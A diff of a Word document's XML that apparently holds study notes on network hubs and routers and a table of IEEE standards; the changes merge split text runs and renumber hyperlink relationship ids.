-        <w:t xml:space="preserve"> Hubs are general network devices </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( These</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are mostly out of use at present condition) that just connect all point of the network. When a packet is sent the packet is duplicated and sent to all the point over the network. This is huge waste of bandwidth or baud.</w:t>
+        <w:t xml:space="preserve"> Hubs are general network devices ( These are mostly out of use at present condition) that just connect all point of the network. When a packet is sent the packet is duplicated and sent to all the point over the network. This is huge waste of bandwidth or baud.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3003,23 +2654,7 @@
         <w:t xml:space="preserve">Router: </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> While the above two are intra networking devices this is </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a inter</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> networking device. This is a layer 3 device. The routers are responsible for path </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>definition ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> packet forwarding / filtering(Just separation of packets,  It does not discard them) and Internetworking.</w:t>
+        <w:t xml:space="preserve"> While the above two are intra networking devices this is a inter networking device. This is a layer 3 device. The routers are responsible for path definition , packet forwarding / filtering(Just separation of packets,  It does not discard them) and Internetworking.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3895,23 +3530,13 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Fiber</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>-optic connection</w:t>
+              <w:t>Fiber-optic connection</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4093,37 +3718,18 @@
               </w:rPr>
               <w:t>Wireless Networking – "</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/WiFi" \o "WiFi" </w:instrText>
-            </w:r>
-            <w:r>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="0000FF"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:u w:val="single"/>
-              </w:rPr>
-              <w:t>WiFi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="0000FF"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-                <w:u w:val="single"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
+            <w:hyperlink r:id="rId32" w:tooltip="WiFi" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                  <w:color w:val="0000FF"/>
+                  <w:sz w:val="24"/>
+                  <w:szCs w:val="24"/>
+                  <w:u w:val="single"/>
+                </w:rPr>
+                <w:t>WiFi</w:t>
+              </w:r>
+            </w:hyperlink>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4155,7 +3761,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId32" w:tooltip="IEEE 802.12" w:history="1">
+            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.12" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4215,7 +3821,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.14" w:history="1">
+            <w:hyperlink r:id="rId34" w:tooltip="IEEE 802.14" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4275,7 +3881,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId34" w:tooltip="IEEE 802.15.2" w:history="1">
+            <w:hyperlink r:id="rId35" w:tooltip="IEEE 802.15.2" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4335,7 +3941,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId35" w:tooltip="IEEE 802.15.4" w:history="1">
+            <w:hyperlink r:id="rId36" w:tooltip="IEEE 802.15.4" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4372,7 +3978,7 @@
               </w:rPr>
               <w:t>Wireless Sensor/Control Networks – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId36" w:tooltip="ZigBee" w:history="1">
+            <w:hyperlink r:id="rId37" w:tooltip="ZigBee" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4415,7 +4021,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId37" w:tooltip="IEEE 802.15.6" w:history="1">
+            <w:hyperlink r:id="rId38" w:tooltip="IEEE 802.15.6" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4452,7 +4058,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Wireless </w:t>
             </w:r>
-            <w:hyperlink r:id="rId38" w:tooltip="Body Area Network" w:history="1">
+            <w:hyperlink r:id="rId39" w:tooltip="Body Area Network" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4464,7 +4070,7 @@
                 <w:t>Body Area Network</w:t>
               </w:r>
             </w:hyperlink>
-            <w:hyperlink r:id="rId39" w:anchor="cite_note-15" w:history="1">
+            <w:hyperlink r:id="rId40" w:anchor="cite_note-15" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4485,7 +4091,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> (BAN) – (e.g. </w:t>
             </w:r>
-            <w:hyperlink r:id="rId40" w:tooltip="Bluetooth low energy" w:history="1">
+            <w:hyperlink r:id="rId41" w:tooltip="Bluetooth low energy" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4528,7 +4134,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId41" w:tooltip="IEEE 802.16" w:history="1">
+            <w:hyperlink r:id="rId42" w:tooltip="IEEE 802.16" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4565,7 +4171,7 @@
               </w:rPr>
               <w:t>Wireless Networking – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId42" w:tooltip="WiMAX" w:history="1">
+            <w:hyperlink r:id="rId43" w:tooltip="WiMAX" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4608,7 +4214,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId43" w:tooltip="IEEE 802.24 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId44" w:tooltip="IEEE 802.24 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4668,7 +4274,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId44" w:tooltip="IEEE 828 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId45" w:tooltip="IEEE 828 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4728,7 +4334,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId45" w:tooltip="IEEE 829" w:history="1">
+            <w:hyperlink r:id="rId46" w:tooltip="IEEE 829" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4788,7 +4394,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId46" w:tooltip="IEEE 830" w:history="1">
+            <w:hyperlink r:id="rId47" w:tooltip="IEEE 830" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4848,7 +4454,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId47" w:tooltip="IEEE 896" w:history="1">
+            <w:hyperlink r:id="rId48" w:tooltip="IEEE 896" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4877,7 +4483,6 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4886,7 +4491,6 @@
               </w:rPr>
               <w:t>Futurebus</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4910,7 +4514,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId48" w:tooltip="IEEE 1003" w:history="1">
+            <w:hyperlink r:id="rId49" w:tooltip="IEEE 1003" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4939,7 +4543,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId49" w:tooltip="Unix" w:history="1">
+            <w:hyperlink r:id="rId50" w:tooltip="Unix" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4982,7 +4586,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId50" w:tooltip="IEEE 1016" w:history="1">
+            <w:hyperlink r:id="rId51" w:tooltip="IEEE 1016" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5042,7 +4646,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId51" w:tooltip="IEEE 1028 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId52" w:tooltip="IEEE 1028 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5102,7 +4706,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId52" w:tooltip="IEEE 1044.1 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId53" w:tooltip="IEEE 1044.1 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5162,7 +4766,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId53" w:tooltip="IEEE 1059 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId54" w:tooltip="IEEE 1059 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5222,7 +4826,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId54" w:tooltip="IEEE 1073" w:history="1">
+            <w:hyperlink r:id="rId55" w:tooltip="IEEE 1073" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5282,7 +4886,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId55" w:tooltip="IEEE 1074 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId56" w:tooltip="IEEE 1074 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5342,7 +4946,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId56" w:tooltip="IEEE 1076" w:history="1">
+            <w:hyperlink r:id="rId57" w:tooltip="IEEE 1076" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5371,7 +4975,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId57" w:tooltip="VHDL" w:history="1">
+            <w:hyperlink r:id="rId58" w:tooltip="VHDL" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5391,7 +4995,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
-            <w:hyperlink r:id="rId58" w:tooltip="VHSIC" w:history="1">
+            <w:hyperlink r:id="rId59" w:tooltip="VHSIC" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5411,7 +5015,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId59" w:tooltip="Hardware Description Language" w:history="1">
+            <w:hyperlink r:id="rId60" w:tooltip="Hardware Description Language" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5446,7 +5050,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId60" w:tooltip="JTAG" w:history="1">
+            <w:hyperlink r:id="rId61" w:tooltip="JTAG" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5506,7 +5110,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId61" w:tooltip="JTAG" w:history="1">
+            <w:hyperlink r:id="rId62" w:tooltip="JTAG" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5535,7 +5139,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId62" w:tooltip="AC-JTAG (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId63" w:tooltip="AC-JTAG (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5570,7 +5174,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId63" w:tooltip="IEEE 1180 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId64" w:tooltip="IEEE 1180 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5599,7 +5203,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId64" w:tooltip="Discrete cosine transform" w:history="1">
+            <w:hyperlink r:id="rId65" w:tooltip="Discrete cosine transform" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5642,7 +5246,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId65" w:tooltip="IEEE 1233" w:history="1">
+            <w:hyperlink r:id="rId66" w:tooltip="IEEE 1233" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5702,7 +5306,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId66" w:tooltip="IEEE 1275" w:history="1">
+            <w:hyperlink r:id="rId67" w:tooltip="IEEE 1275" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5762,7 +5366,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId67" w:tooltip="IEEE 1284" w:history="1">
+            <w:hyperlink r:id="rId68" w:tooltip="IEEE 1284" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5791,7 +5395,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId68" w:tooltip="Parallel port" w:history="1">
+            <w:hyperlink r:id="rId69" w:tooltip="Parallel port" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5826,7 +5430,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId69" w:tooltip="IEEE P1363" w:history="1">
+            <w:hyperlink r:id="rId70" w:tooltip="IEEE P1363" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5855,7 +5459,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId70" w:tooltip="Public key cryptography" w:history="1">
+            <w:hyperlink r:id="rId71" w:tooltip="Public key cryptography" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5890,7 +5494,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId71" w:tooltip="IEEE 1394" w:history="1">
+            <w:hyperlink r:id="rId72" w:tooltip="IEEE 1394" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5925,25 +5529,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Serial bus – "FireWire", "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>i.Link</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>"</w:t>
+              <w:t>Serial bus – "FireWire", "i.Link"</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5968,7 +5554,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId72" w:tooltip="IEEE 1471" w:history="1">
+            <w:hyperlink r:id="rId73" w:tooltip="IEEE 1471" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5997,7 +5583,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId73" w:tooltip="Software architecture" w:history="1">
+            <w:hyperlink r:id="rId74" w:tooltip="Software architecture" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6017,7 +5603,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> / </w:t>
             </w:r>
-            <w:hyperlink r:id="rId74" w:tooltip="System architecture" w:history="1">
+            <w:hyperlink r:id="rId75" w:tooltip="System architecture" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6052,7 +5638,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId75" w:tooltip="IEEE 1541" w:history="1">
+            <w:hyperlink r:id="rId76" w:tooltip="IEEE 1541" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6081,7 +5667,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId76" w:tooltip="Binary prefix" w:history="1">
+            <w:hyperlink r:id="rId77" w:tooltip="Binary prefix" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6116,7 +5702,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId77" w:tooltip="IEEE 1584" w:history="1">
+            <w:hyperlink r:id="rId78" w:tooltip="IEEE 1584" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6153,7 +5739,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Guide for Performing </w:t>
             </w:r>
-            <w:hyperlink r:id="rId78" w:tooltip="Arc Flash" w:history="1">
+            <w:hyperlink r:id="rId79" w:tooltip="Arc Flash" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6196,7 +5782,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId79" w:tooltip="IEEE 1588" w:history="1">
+            <w:hyperlink r:id="rId80" w:tooltip="IEEE 1588" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6256,7 +5842,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId80" w:tooltip="IEEE P1619" w:history="1">
+            <w:hyperlink r:id="rId81" w:tooltip="IEEE P1619" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6316,7 +5902,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId81" w:tooltip="IEEE 1666 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId82" w:tooltip="IEEE 1666 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6351,25 +5937,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t xml:space="preserve">IEEE Standard for Standard </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>SystemC</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Language Reference Manual</w:t>
+              <w:t>IEEE Standard for Standard SystemC Language Reference Manual</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6394,7 +5962,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId82" w:tooltip="IEEE 1667" w:history="1">
+            <w:hyperlink r:id="rId83" w:tooltip="IEEE 1667" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6454,7 +6022,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId83" w:tooltip="Unified Power Format" w:history="1">
+            <w:hyperlink r:id="rId84" w:tooltip="Unified Power Format" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6483,7 +6051,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId84" w:tooltip="Unified Power Format" w:history="1">
